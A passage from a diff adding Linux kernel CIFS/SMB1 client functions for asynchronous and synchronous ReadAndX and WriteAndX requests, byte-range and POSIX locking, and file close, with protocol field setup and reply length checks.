++		cifs_stats_bytes_read(tcon, rdata->got_bytes);
++		break;
++	case MID_REQUEST_SUBMITTED:
++	case MID_RETRY_NEEDED:
++		rdata->result = -EAGAIN;
++		if (server->sign && rdata->got_bytes)
++			/* reset the byte count since we cannot verify the signature */
++			rdata->got_bytes = 0;
++		/* FIXME: should this be counted toward the initiating task? */
++		task_io_account_read(rdata->got_bytes);
++		cifs_stats_bytes_read(tcon, rdata->got_bytes);
++		break;
++	default:
++		rdata->result = -EIO;
++	}
++
++	queue_work(cifsiod_wq, &rdata->work);
++	release_mid(mid);
++	add_credits(server, &credits, 0);
++}
++
++/* cifs_async_readv - send an async read, and set up mid to handle result */
++int
++cifs_async_readv(struct cifs_readdata *rdata)
++{
++	int rc;
++	READ_REQ *smb = NULL;
++	int wct;
++	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
++	struct smb_rqst rqst = { .rq_iov = rdata->iov,
++				 .rq_nvec = 2 };
++
++	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
++		 __func__, rdata->offset, rdata->bytes);
++
++	if (tcon->ses->capabilities & CAP_LARGE_FILES)
++		wct = 12;
++	else {
++		wct = 10; /* old style read */
++		if ((rdata->offset >> 32) > 0)  {
++			/* can not handle this big offset for old */
++			return -EIO;
++		}
++	}
++
++	rc = small_smb_init(SMB_COM_READ_ANDX, wct, tcon, (void **)&smb);
++	if (rc)
++		return rc;
++
++	smb->hdr.Pid = cpu_to_le16((__u16)rdata->pid);
++	smb->hdr.PidHigh = cpu_to_le16((__u16)(rdata->pid >> 16));
++
++	smb->AndXCommand = 0xFF;	/* none */
++	smb->Fid = rdata->cfile->fid.netfid;
++	smb->OffsetLow = cpu_to_le32(rdata->offset & 0xFFFFFFFF);
++	if (wct == 12)
++		smb->OffsetHigh = cpu_to_le32(rdata->offset >> 32);
++	smb->Remaining = 0;
++	smb->MaxCount = cpu_to_le16(rdata->bytes & 0xFFFF);
++	smb->MaxCountHigh = cpu_to_le32(rdata->bytes >> 16);
++	if (wct == 12)
++		smb->ByteCount = 0;
++	else {
++		/* old style read */
++		struct smb_com_readx_req *smbr =
++			(struct smb_com_readx_req *)smb;
++		smbr->ByteCount = 0;
++	}
++
++	/* 4 for RFC1001 length + 1 for BCC */
++	rdata->iov[0].iov_base = smb;
++	rdata->iov[0].iov_len = 4;
++	rdata->iov[1].iov_base = (char *)smb + 4;
++	rdata->iov[1].iov_len = get_rfc1002_length(smb);
++
++	kref_get(&rdata->refcount);
++	rc = cifs_call_async(tcon->ses->server, &rqst, cifs_readv_receive,
++			     cifs_readv_callback, NULL, rdata, 0, NULL);
++
++	if (rc == 0)
++		cifs_stats_inc(&tcon->stats.cifs_stats.num_reads);
++	else
++		kref_put(&rdata->refcount, cifs_readdata_release);
++
++	cifs_small_buf_release(smb);
++	return rc;
++}
++
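++/* Synchronous read via ReadAndX (SMB_COM_READ_ANDX) */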
++int
++CIFSSMBRead(const unsigned int xid, struct cifs_io_parms *io_parms,
++	    unsigned int *nbytes, char **buf, int *pbuf_type)
++{
++	int rc = -EACCES;
++	READ_REQ *pSMB = NULL;
++	READ_RSP *pSMBr = NULL;
++	char *pReadData = NULL;
++	int wct;
++	int resp_buf_type = 0;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	__u32 pid = io_parms->pid;
++	__u16 netfid = io_parms->netfid;
++	__u64 offset = io_parms->offset;
++	struct cifs_tcon *tcon = io_parms->tcon;
++	unsigned int count = io_parms->length;
++
++	cifs_dbg(FYI, "Reading %d bytes on fid %d\n", count, netfid);
++	if (tcon->ses->capabilities & CAP_LARGE_FILES)
++		wct = 12;
++	else {
++		wct = 10; /* old style read */
++		if ((offset >> 32) > 0)  {
++			/* can not handle this big offset for old */
++			return -EIO;
++		}
++	}
++
++	*nbytes = 0;
++	rc = small_smb_init(SMB_COM_READ_ANDX, wct, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
++
++	/* tcon and ses pointers are checked in smb_init */
++	if (tcon->ses->server == NULL)
++		return -ECONNABORTED;
++
++	pSMB->AndXCommand = 0xFF;       /* none */
++	pSMB->Fid = netfid;
++	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
++	if (wct == 12)
++		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
++
++	pSMB->Remaining = 0;
++	pSMB->MaxCount = cpu_to_le16(count & 0xFFFF);
++	pSMB->MaxCountHigh = cpu_to_le32(count >> 16);
++	if (wct == 12)
++		pSMB->ByteCount = 0;  /* no need to do le conversion since 0 */
++	else {
++		/* old style read */
++		struct smb_com_readx_req *pSMBW =
++			(struct smb_com_readx_req *)pSMB;
++		pSMBW->ByteCount = 0;
++	}
++
++	iov[0].iov_base = (char *)pSMB;
++	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
++	rc = SendReceive2(xid, tcon->ses, iov, 1, &resp_buf_type,
++			  CIFS_LOG_ERROR, &rsp_iov);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_reads);
++	pSMBr = (READ_RSP *)rsp_iov.iov_base;
++	if (rc) {
++		cifs_dbg(VFS, "Send error in read = %d\n", rc);
++	} else {
++		int data_length = le16_to_cpu(pSMBr->DataLengthHigh);
++		data_length = data_length << 16;
++		data_length += le16_to_cpu(pSMBr->DataLength);
++		*nbytes = data_length;
++
++		/* check that DataLength would not go beyond end of SMB */
++		if ((data_length > CIFSMaxBufSize)
++				|| (data_length > count)) {
++			cifs_dbg(FYI, "bad length %d for count %d\n",
++				 data_length, count);
++			rc = -EIO;
++			*nbytes = 0;
++		} else {
++			pReadData = (char *) (&pSMBr->hdr.Protocol) +
++					le16_to_cpu(pSMBr->DataOffset);
++/*			if (rc = copy_to_user(buf, pReadData, data_length)) {
++				cifs_dbg(VFS, "Faulting on read rc = %d\n",rc);
++				rc = -EFAULT;
++			}*/ /* can not use copy_to_user when using page cache*/
++			if (*buf)
++				memcpy(*buf, pReadData, data_length);
++		}
++	}
++
++	if (*buf) {
++		free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
++	} else if (resp_buf_type != CIFS_NO_BUFFER) {
++		/* return buffer to caller to free */
++		*buf = rsp_iov.iov_base;
++		if (resp_buf_type == CIFS_SMALL_BUFFER)
++			*pbuf_type = CIFS_SMALL_BUFFER;
++		else if (resp_buf_type == CIFS_LARGE_BUFFER)
++			*pbuf_type = CIFS_LARGE_BUFFER;
++	} /* else no valid buffer on return - leave as null */
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++	return rc;
++}
++
++
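++/* Synchronous write via WriteAndX (SMB_COM_WRITE_ANDX) */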
++int
++CIFSSMBWrite(const unsigned int xid, struct cifs_io_parms *io_parms,
++	     unsigned int *nbytes, const char *buf)
++{
++	int rc = -EACCES;
++	WRITE_REQ *pSMB = NULL;
++	WRITE_RSP *pSMBr = NULL;
++	int bytes_returned, wct;
++	__u32 bytes_sent;
++	__u16 byte_count;
++	__u32 pid = io_parms->pid;
++	__u16 netfid = io_parms->netfid;
++	__u64 offset = io_parms->offset;
++	struct cifs_tcon *tcon = io_parms->tcon;
++	unsigned int count = io_parms->length;
++
++	*nbytes = 0;
++
++	/* cifs_dbg(FYI, "write at %lld %d bytes\n", offset, count);*/
++	if (tcon->ses == NULL)
++		return -ECONNABORTED;
++
++	if (tcon->ses->capabilities & CAP_LARGE_FILES)
++		wct = 14;
++	else {
++		wct = 12;
++		if ((offset >> 32) > 0) {
++			/* can not handle big offset for old srv */
++			return -EIO;
++		}
++	}
++
++	rc = smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
++
++	/* tcon and ses pointers are checked in smb_init */
++	if (tcon->ses->server == NULL)
++		return -ECONNABORTED;
++
++	pSMB->AndXCommand = 0xFF;	/* none */
++	pSMB->Fid = netfid;
++	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
++	if (wct == 14)
++		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
++
++	pSMB->Reserved = 0xFFFFFFFF;
++	pSMB->WriteMode = 0;
++	pSMB->Remaining = 0;
++
++	/*
++	 * Can increase buffer size if buffer is big enough in some cases, i.e.
++	 * we can send more if LARGE_WRITE_X capability is returned by the
++	 * server and our buffer is big enough, or if we convert to iovecs on
++	 * socket writes and eliminate the copy to the CIFS buffer.
++	 */
++	if (tcon->ses->capabilities & CAP_LARGE_WRITE_X) {
++		bytes_sent = min_t(const unsigned int, CIFSMaxBufSize, count);
++	} else {
++		bytes_sent = (tcon->ses->server->maxBuf - MAX_CIFS_HDR_SIZE)
++			 & ~0xFF;
++	}
++
++	if (bytes_sent > count)
++		bytes_sent = count;
++	pSMB->DataOffset =
++		cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
++	if (buf)
++		memcpy(pSMB->Data, buf, bytes_sent);
++	else if (count != 0) {
++		/* No buffer */
++		cifs_buf_release(pSMB);
++		return -EINVAL;
++	} /* else setting file size with write of zero bytes */
++	if (wct == 14)
++		byte_count = bytes_sent + 1; /* pad */
++	else /* wct == 12 */
++		byte_count = bytes_sent + 5; /* bigger pad, smaller smb hdr */
++
++	pSMB->DataLengthLow = cpu_to_le16(bytes_sent & 0xFFFF);
++	pSMB->DataLengthHigh = cpu_to_le16(bytes_sent >> 16);
++	inc_rfc1001_len(pSMB, byte_count);
++
++	if (wct == 14)
++		pSMB->ByteCount = cpu_to_le16(byte_count);
++	else { /* old style write has byte count 4 bytes earlier
++		  so 4 bytes pad  */
++		struct smb_com_writex_req *pSMBW =
++			(struct smb_com_writex_req *)pSMB;
++		pSMBW->ByteCount = cpu_to_le16(byte_count);
++	}
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in write = %d\n", rc);
++	} else {
++		*nbytes = le16_to_cpu(pSMBr->CountHigh);
++		*nbytes = (*nbytes) << 16;
++		*nbytes += le16_to_cpu(pSMBr->Count);
++
++		/*
++		 * Mask off high 16 bits when bytes written as returned by the
++		 * server is greater than bytes requested by the client. Some
++		 * OS/2 servers are known to set incorrect CountHigh values.
++		 */
++		if (*nbytes > count)
++			*nbytes &= 0xFFFF;
++	}
++
++	cifs_buf_release(pSMB);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
++/*
++ * Check the mid_state and signature on received buffer (if any), and queue the
++ * workqueue completion task.
++ */
++static void
++cifs_writev_callback(struct mid_q_entry *mid)
++{
++	struct cifs_writedata *wdata = mid->callback_data;
++	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
++	unsigned int written;
++	WRITE_RSP *smb = (WRITE_RSP *)mid->resp_buf;
++	struct cifs_credits credits = { .value = 1, .instance = 0 };
++
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		wdata->result = cifs_check_receive(mid, tcon->ses->server, 0);
++		if (wdata->result != 0)
++			break;
++
++		written = le16_to_cpu(smb->CountHigh);
++		written <<= 16;
++		written += le16_to_cpu(smb->Count);
++		/*
++		 * Mask off high 16 bits when bytes written as returned
++		 * by the server is greater than bytes requested by the
++		 * client. OS/2 servers are known to set incorrect
++		 * CountHigh values.
++		 */
++		if (written > wdata->bytes)
++			written &= 0xFFFF;
++
++		if (written < wdata->bytes)
++			wdata->result = -ENOSPC;
++		else
++			wdata->bytes = written;
++		break;
++	case MID_REQUEST_SUBMITTED:
++	case MID_RETRY_NEEDED:
++		wdata->result = -EAGAIN;
++		break;
++	default:
++		wdata->result = -EIO;
++		break;
++	}
++
++	queue_work(cifsiod_wq, &wdata->work);
++	release_mid(mid);
++	add_credits(tcon->ses->server, &credits, 0);
++}
++
++/* cifs_async_writev - send an async write, and set up mid to handle result */
++int
++cifs_async_writev(struct cifs_writedata *wdata,
++		  void (*release)(struct kref *kref))
++{
++	int rc = -EACCES;
++	WRITE_REQ *smb = NULL;
++	int wct;
++	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
++	struct kvec iov[2];
++	struct smb_rqst rqst = { };
++
++	if (tcon->ses->capabilities & CAP_LARGE_FILES) {
++		wct = 14;
++	} else {
++		wct = 12;
++		if (wdata->offset >> 32 > 0) {
++			/* can not handle big offset for old srv */
++			return -EIO;
++		}
++	}
++
++	rc = small_smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **)&smb);
++	if (rc)
++		goto async_writev_out;
++
++	smb->hdr.Pid = cpu_to_le16((__u16)wdata->pid);
++	smb->hdr.PidHigh = cpu_to_le16((__u16)(wdata->pid >> 16));
++
++	smb->AndXCommand = 0xFF;	/* none */
++	smb->Fid = wdata->cfile->fid.netfid;
++	smb->OffsetLow = cpu_to_le32(wdata->offset & 0xFFFFFFFF);
++	if (wct == 14)
++		smb->OffsetHigh = cpu_to_le32(wdata->offset >> 32);
++	smb->Reserved = 0xFFFFFFFF;
++	smb->WriteMode = 0;
++	smb->Remaining = 0;
++
++	smb->DataOffset =
++	    cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
++
++	/* 4 for RFC1001 length + 1 for BCC */
++	iov[0].iov_len = 4;
++	iov[0].iov_base = smb;
++	iov[1].iov_len = get_rfc1002_length(smb) + 1;
++	iov[1].iov_base = (char *)smb + 4;
++
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 2;
++	rqst.rq_pages = wdata->pages;
++	rqst.rq_offset = wdata->page_offset;
++	rqst.rq_npages = wdata->nr_pages;
++	rqst.rq_pagesz = wdata->pagesz;
++	rqst.rq_tailsz = wdata->tailsz;
++
++	cifs_dbg(FYI, "async write at %llu %u bytes\n",
++		 wdata->offset, wdata->bytes);
++
++	smb->DataLengthLow = cpu_to_le16(wdata->bytes & 0xFFFF);
++	smb->DataLengthHigh = cpu_to_le16(wdata->bytes >> 16);
++
++	if (wct == 14) {
++		inc_rfc1001_len(&smb->hdr, wdata->bytes + 1);
++		put_bcc(wdata->bytes + 1, &smb->hdr);
++	} else {
++		/* wct == 12 */
++		struct smb_com_writex_req *smbw =
++				(struct smb_com_writex_req *)smb;
++		inc_rfc1001_len(&smbw->hdr, wdata->bytes + 5);
++		put_bcc(wdata->bytes + 5, &smbw->hdr);
++		iov[1].iov_len += 4; /* pad bigger by four bytes */
++	}
++
++	kref_get(&wdata->refcount);
++	rc = cifs_call_async(tcon->ses->server, &rqst, NULL,
++			     cifs_writev_callback, NULL, wdata, 0, NULL);
++
++	if (rc == 0)
++		cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
++	else
++		kref_put(&wdata->refcount, release);
++
++async_writev_out:
++	cifs_small_buf_release(smb);
++	return rc;
++}
++
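++/* Vectored synchronous write via WriteAndX, taking the data as a kvec array */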
++int
++CIFSSMBWrite2(const unsigned int xid, struct cifs_io_parms *io_parms,
++	      unsigned int *nbytes, struct kvec *iov, int n_vec)
++{
++	int rc;
++	WRITE_REQ *pSMB = NULL;
++	int wct;
++	int smb_hdr_len;
++	int resp_buf_type = 0;
++	__u32 pid = io_parms->pid;
++	__u16 netfid = io_parms->netfid;
++	__u64 offset = io_parms->offset;
++	struct cifs_tcon *tcon = io_parms->tcon;
++	unsigned int count = io_parms->length;
++	struct kvec rsp_iov;
++
++	*nbytes = 0;
++
++	cifs_dbg(FYI, "write2 at %lld %d bytes\n", (long long)offset, count);
++
++	if (tcon->ses->capabilities & CAP_LARGE_FILES) {
++		wct = 14;
++	} else {
++		wct = 12;
++		if ((offset >> 32) > 0) {
++			/* can not handle big offset for old srv */
++			return -EIO;
++		}
++	}
++	rc = small_smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
++
++	/* tcon and ses pointers are checked in smb_init */
++	if (tcon->ses->server == NULL)
++		return -ECONNABORTED;
++
++	pSMB->AndXCommand = 0xFF;	/* none */
++	pSMB->Fid = netfid;
++	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
++	if (wct == 14)
++		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
++	pSMB->Reserved = 0xFFFFFFFF;
++	pSMB->WriteMode = 0;
++	pSMB->Remaining = 0;
++
++	pSMB->DataOffset =
++	    cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
++
++	pSMB->DataLengthLow = cpu_to_le16(count & 0xFFFF);
++	pSMB->DataLengthHigh = cpu_to_le16(count >> 16);
++	/* header + 1 byte pad */
++	smb_hdr_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 1;
++	if (wct == 14)
++		inc_rfc1001_len(pSMB, count + 1);
++	else /* wct == 12 */
++		inc_rfc1001_len(pSMB, count + 5); /* smb data starts later */
++	if (wct == 14)
++		pSMB->ByteCount = cpu_to_le16(count + 1);
++	else /* wct == 12 */ /* bigger pad, smaller smb hdr, keep offset ok */ {
++		struct smb_com_writex_req *pSMBW =
++				(struct smb_com_writex_req *)pSMB;
++		pSMBW->ByteCount = cpu_to_le16(count + 5);
++	}
++	iov[0].iov_base = pSMB;
++	if (wct == 14)
++		iov[0].iov_len = smb_hdr_len + 4;
++	else /* wct == 12 pad bigger by four bytes */
++		iov[0].iov_len = smb_hdr_len + 8;
++
++	rc = SendReceive2(xid, tcon->ses, iov, n_vec + 1, &resp_buf_type, 0,
++			  &rsp_iov);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
++	if (rc) {
++		cifs_dbg(FYI, "Send error Write2 = %d\n", rc);
++	} else if (resp_buf_type == 0) {
++		/* presumably this can not happen, but best to be safe */
++		rc = -EIO;
++	} else {
++		WRITE_RSP *pSMBr = (WRITE_RSP *)rsp_iov.iov_base;
++		*nbytes = le16_to_cpu(pSMBr->CountHigh);
++		*nbytes = (*nbytes) << 16;
++		*nbytes += le16_to_cpu(pSMBr->Count);
++
++		/*
++		 * Mask off high 16 bits when bytes written as returned by the
++		 * server is greater than bytes requested by the client. OS/2
++		 * servers are known to set incorrect CountHigh values.
++		 */
++		if (*nbytes > count)
++			*nbytes &= 0xFFFF;
++	}
++
++	free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
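++/* Send an array of byte-range lock/unlock requests via LockingAndX */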
++int cifs_lockv(const unsigned int xid, struct cifs_tcon *tcon,
++	       const __u16 netfid, const __u8 lock_type, const __u32 num_unlock,
++	       const __u32 num_lock, LOCKING_ANDX_RANGE *buf)
++{
++	int rc = 0;
++	LOCK_REQ *pSMB = NULL;
++	struct kvec iov[2];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++	__u16 count;
++
++	cifs_dbg(FYI, "cifs_lockv num lock %d num unlock %d\n",
++		 num_lock, num_unlock);
++
++	rc = small_smb_init(SMB_COM_LOCKING_ANDX, 8, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->Timeout = 0;
++	pSMB->NumberOfLocks = cpu_to_le16(num_lock);
++	pSMB->NumberOfUnlocks = cpu_to_le16(num_unlock);
++	pSMB->LockType = lock_type;
++	pSMB->AndXCommand = 0xFF; /* none */
++	pSMB->Fid = netfid; /* netfid stays le */
++
++	count = (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	iov[0].iov_base = (char *)pSMB;
++	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4 -
++			 (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
++	iov[1].iov_base = (char *)buf;
++	iov[1].iov_len = (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
++
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
++	rc = SendReceive2(xid, tcon->ses, iov, 2, &resp_buf_type,
++			  CIFS_NO_RSP_BUF, &rsp_iov);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(FYI, "Send error in cifs_lockv = %d\n", rc);
++
++	return rc;
++}
++
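++/* Lock or unlock a single byte range, or release an oplock, via LockingAndX */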
++int
++CIFSSMBLock(const unsigned int xid, struct cifs_tcon *tcon,
++	    const __u16 smb_file_id, const __u32 netpid, const __u64 len,
++	    const __u64 offset, const __u32 numUnlock,
++	    const __u32 numLock, const __u8 lockType,
++	    const bool waitFlag, const __u8 oplock_level)
++{
++	int rc = 0;
++	LOCK_REQ *pSMB = NULL;
++/*	LOCK_RSP *pSMBr = NULL; */ /* No response data other than rc to parse */
++	int bytes_returned;
++	int flags = 0;
++	__u16 count;
++
++	cifs_dbg(FYI, "CIFSSMBLock timeout %d numLock %d\n",
++		 (int)waitFlag, numLock);
++	rc = small_smb_init(SMB_COM_LOCKING_ANDX, 8, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	if (lockType == LOCKING_ANDX_OPLOCK_RELEASE) {
++		/* no response expected */
++		flags = CIFS_NO_SRV_RSP | CIFS_NON_BLOCKING | CIFS_OBREAK_OP;
++		pSMB->Timeout = 0;
++	} else if (waitFlag) {
++		flags = CIFS_BLOCKING_OP; /* blocking operation, no timeout */
++		pSMB->Timeout = cpu_to_le32(-1);/* blocking - do not time out */
++	} else {
++		pSMB->Timeout = 0;
++	}
++
++	pSMB->NumberOfLocks = cpu_to_le16(numLock);
++	pSMB->NumberOfUnlocks = cpu_to_le16(numUnlock);
++	pSMB->LockType = lockType;
++	pSMB->OplockLevel = oplock_level;
++	pSMB->AndXCommand = 0xFF;	/* none */
++	pSMB->Fid = smb_file_id; /* netfid stays le */
++
++	if ((numLock != 0) || (numUnlock != 0)) {
++		pSMB->Locks[0].Pid = cpu_to_le16(netpid);
++		/* BB where to store pid high? */
++		pSMB->Locks[0].LengthLow = cpu_to_le32((u32)len);
++		pSMB->Locks[0].LengthHigh = cpu_to_le32((u32)(len>>32));
++		pSMB->Locks[0].OffsetLow = cpu_to_le32((u32)offset);
++		pSMB->Locks[0].OffsetHigh = cpu_to_le32((u32)(offset>>32));
++		count = sizeof(LOCKING_ANDX_RANGE);
++	} else {
++		/* oplock break */
++		count = 0;
++	}
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	if (waitFlag)
++		rc = SendReceiveBlockingLock(xid, tcon, (struct smb_hdr *) pSMB,
++			(struct smb_hdr *) pSMB, &bytes_returned);
++	else
++		rc = SendReceiveNoRsp(xid, tcon->ses, (char *)pSMB, flags);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
++	if (rc)
++		cifs_dbg(FYI, "Send error in Lock = %d\n", rc);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++	since file handle passed in no longer valid */
++	return rc;
++}
++
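++/* Get or set a POSIX byte-range lock via the TRANS2 file information calls */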
++int
++CIFSSMBPosixLock(const unsigned int xid, struct cifs_tcon *tcon,
++		const __u16 smb_file_id, const __u32 netpid,
++		const loff_t start_offset, const __u64 len,
++		struct file_lock *pLockData, const __u16 lock_type,
++		const bool waitFlag)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	struct smb_com_transaction2_sfi_rsp *pSMBr = NULL;
++	struct cifs_posix_lock *parm_data;
++	int rc = 0;
++	int timeout = 0;
++	int bytes_returned = 0;
++	int resp_buf_type = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++
++	cifs_dbg(FYI, "Posix Lock\n");
++
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMBr = (struct smb_com_transaction2_sfi_rsp *)pSMB;
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	count = sizeof(struct cifs_posix_lock);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000); /* BB find max SMB from sess */
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	if (pLockData)
++		pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
++	else
++		pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	parm_data = (struct cifs_posix_lock *)
++			(((char *)pSMB) + offset + 4);
++
++	parm_data->lock_type = cpu_to_le16(lock_type);
++	if (waitFlag) {
++		timeout = CIFS_BLOCKING_OP; /* blocking operation, no timeout */
++		parm_data->lock_flags = cpu_to_le16(1);
++		pSMB->Timeout = cpu_to_le32(-1);
++	} else
++		pSMB->Timeout = 0;
++
++	parm_data->pid = cpu_to_le32(netpid);
++	parm_data->start = cpu_to_le64(start_offset);
++	parm_data->length = cpu_to_le64(len);  /* normalize negative numbers */
++
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->Fid = smb_file_id;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_POSIX_LOCK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	if (waitFlag) {
++		rc = SendReceiveBlockingLock(xid, tcon, (struct smb_hdr *) pSMB,
++			(struct smb_hdr *) pSMBr, &bytes_returned);
++	} else {
++		iov[0].iov_base = (char *)pSMB;
++		iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
++		rc = SendReceive2(xid, tcon->ses, iov, 1 /* num iovecs */,
++				&resp_buf_type, timeout, &rsp_iov);
++		pSMBr = (struct smb_com_transaction2_sfi_rsp *)rsp_iov.iov_base;
++	}
++	cifs_small_buf_release(pSMB);
++
++	if (rc) {
++		cifs_dbg(FYI, "Send error in Posix Lock = %d\n", rc);
++	} else if (pLockData) {
++		/* lock structure can be returned on get */
++		__u16 data_offset;
++		__u16 data_count;
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < sizeof(*parm_data)) {
++			rc = -EIO;      /* bad smb */
++			goto plk_err_exit;
++		}
++		data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++		data_count  = le16_to_cpu(pSMBr->t2.DataCount);
++		if (data_count < sizeof(struct cifs_posix_lock)) {
++			rc = -EIO;
++			goto plk_err_exit;
++		}
++		parm_data = (struct cifs_posix_lock *)
++			((char *)&pSMBr->hdr.Protocol + data_offset);
++		if (parm_data->lock_type == cpu_to_le16(CIFS_UNLCK))
++			pLockData->fl_type = F_UNLCK;
++		else {
++			if (parm_data->lock_type ==
++					cpu_to_le16(CIFS_RDLCK))
++				pLockData->fl_type = F_RDLCK;
++			else if (parm_data->lock_type ==
++					cpu_to_le16(CIFS_WRLCK))
++				pLockData->fl_type = F_WRLCK;
++
++			pLockData->fl_start = le64_to_cpu(parm_data->start);
++			pLockData->fl_end = pLockData->fl_start +
++				(le64_to_cpu(parm_data->length) ?
++				 le64_to_cpu(parm_data->length) - 1 : 0);
++			pLockData->fl_pid = -le32_to_cpu(parm_data->pid);
++		}
++	}
++
++plk_err_exit:
++	free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++	   since file handle passed in no longer valid */
++
++	return rc;
++}
++
++
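++/*
++ * Close the file handle on the server. -EAGAIN is treated as success since
++ * a dead session means the server has already closed the handle.
++ */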
++int
++CIFSSMBClose(const unsigned int xid, struct cifs_tcon *tcon, int smb_file_id)
++{
++	int rc = 0;
++	CLOSE_REQ *pSMB = NULL;
++	cifs_dbg(FYI, "In CIFSSMBClose\n");
++
++	/* do not retry on dead session on close */
++	rc = small_smb_init(SMB_COM_CLOSE, 3, tcon, (void **) &pSMB);
++	if (rc == -EAGAIN)
++		return 0;
++	if (rc)
++		return rc;
++
++	pSMB->FileID = (__u16) smb_file_id;
++	pSMB->LastWriteTime = 0xFFFFFFFF;
++	pSMB->ByteCount = 0;
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_closes);
++	if (rc) {
++		if (rc != -EINTR) {
++			/* EINTR is expected when user ctl-c to kill app */
++			cifs_dbg(VFS, "Send error in Close = %d\n", rc);
++		}
++	}
++
++	/* Since session is dead, file will be closed on server already */
++	if (rc == -EAGAIN)
++		rc = 0;
++
++	return rc;
++}
++
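++/* Ask the server to flush cached data for the file handle to disk */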
